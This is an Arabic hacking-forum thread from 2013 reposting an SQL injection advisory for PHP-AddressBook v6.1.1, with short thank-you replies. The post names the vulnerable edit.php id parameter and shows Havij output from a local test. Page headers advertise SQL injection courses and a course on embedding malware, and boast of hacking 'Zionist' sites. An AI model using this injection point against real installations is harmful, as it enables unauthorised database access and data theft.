1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ ثغره ] PHP-AddressBook v6.1.1 (edit.php) SQL Injection Vulnerability

الموضوع في '[ ثــغـرات الأعــضــاء]' بواسطة Ubuntu, بتاريخ ‏14 ديسمبر 2013.

كاتب الموضوع : Ubuntu المشاهدات : 595 الردود : 3 ‏14 ديسمبر 2013
حالة الموضوع:
مغلق
  1. غير متصل

    Ubuntu
    rankrank
    Developer

    عضو منذ:
    ‏6 يناير 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:

    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله تعالى وبركاته


    ثغرة sql

    كود PHP:
     site/path/edit.php?id=

    كود PHP:
    X-------------------------------------------------------------X
     _____ _   _ _   _ _____ _____ _____  ___   _   _   _______   _______ ___________ 
    |_   _| | | | \ | |_   _/  ___|_   _|/ \ | \ | | /  __ \ \ / / ___ \  ______ \
      | | | | | |  \| | | | \ `
    --.  | | / /_\ \|  \| | | /  \/\ V /| |_/ / |__ | |_/ /
      | | | | | | . 
    ` | | |  `--. \ | | |  _  || . ` | | |     \ / | ___ \  __||    / 
      | | | |
    _| | |\  |_| |_/\__/ /_| |_| | | || |\  | | \__/\ | | | |_/ / |___| |\ \ 
      \
    _/  \___/\_| \_/\___/\____/ \___/\_| |_/\_| \_/  \____/ \_/ \____/\____/\_| \_|
    X-------------------------------------------------------------X                                                                                  
     
     
    ***91;+***93AuthorTUNISIAN CYBER
    ***91;+***93Exploit Title:  PHP-AddressBook v6.1.1 (edit.phpSQL Injection Vulnerability
    ***91;+***93Date8-12-2013
    ***91;+***93Vendor:aguestbook.sourceforge.net/
    ***
    91;+***93CategoryWebApp
    ***91;+***93Google Dorkn/a
    ***91;+***93Tested onWin7 ubuntu 13.04
     
     
    ########################################################################################
    Exploit:
    127/PATH/edit.php?id=***91;SQL***93;

    Localtest:http://oi44.tinypic.com/b4t37n.jpg
    ---------------------------
    Havij Result:
    Host IP127.0.0.1
    Web Server
    Apache/2.2.8 (Win32PHP/5.2.6
    Powered
    -byPHP/5.2.6
    Keyword Found
    Smith
    I guess injection type is Integer
    ?! If injection failedretry with a manual keyword.
    DB ServerMySQL
    Selected Column Count is 25
    Valid String Column is 2
    Current DB
    address



    ./3nD
    ########################################################################################
    Greets toXMaXtnN43il HacK3rXtechSEt

     


    جاري تحميل الصفحة...
  2. غير متصل

    rachi-dz
    rankrank
    Developer

    عضو منذ:
    ‏6 يونيو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الوظيفة:
    طالب
    الإقامة:

    رد: PHP-AddressBook v6.1.1 (edit.php) SQL Injection Vulnerability

    تِسلَـمْ أخِي
    بَاركـَ الله فِيكَ
     


  3. غير متصل

    M3N X
    Developer

    عضو منذ:
    ‏16 يوليو 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    9
    نقاط الجائزة:

    رد: PHP-AddressBook v6.1.1 (edit.php) SQL Injection Vulnerability

    يعطيك العافيه موضوع رائع
    تم تقيمك !:"
     


  4. غير متصل

    NETJOURNAL
    مشرف

    عضو منذ:
    ‏18 مايو 2006
    عدد المشاركات:
    الإعجابات المتلقاة:
    1,544
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    ExploitCoding - ShellCoding - Defacer
    الإقامة:

    رد: PHP-AddressBook v6.1.1 (edit.php) SQL Injection Vulnerability

    ^:"^:"^:"^:"^:"
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...